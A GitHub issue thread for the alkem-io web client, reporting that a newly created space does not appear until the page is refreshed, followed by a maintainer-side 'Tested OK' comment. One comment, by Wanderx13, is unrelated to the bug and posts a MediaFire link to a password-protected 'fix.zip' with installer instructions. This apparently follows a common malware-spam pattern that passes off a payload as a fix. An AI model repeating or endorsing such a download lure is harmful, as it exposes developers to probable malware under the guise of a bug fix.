### ISSUE TITLE
BUG: When create a space from user account, the page doesn't display it

### ISSUE THREAD

**Issue by Comoque1** [alkem-io/client-web#6814]
**Describe the bug**

**To Reproduce**

1. Go to http://localhost:3000/user/beta-tester/settings/account
2. Create a space
3. The request is successful, but the space is not displayed until refreshed
<img width="1223" src="https://api.zenhub.com/attachedFiles/eyJfcmFpbHMiOnsibWVzc2FnZSI6IkJBaHBBMW1HQmc9PSIsImV4cCI6bnVsbCwicHVyIjoiYmxvYl9pZCJ9fQ==--9f6cf5fbbaa2bdb62c84550a3cd0face0756b9e8/image.png" alt="image.png" />

**Expected behavior**
Space is displayed.

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Comoque1** [comment]
Tested OK on DEV env
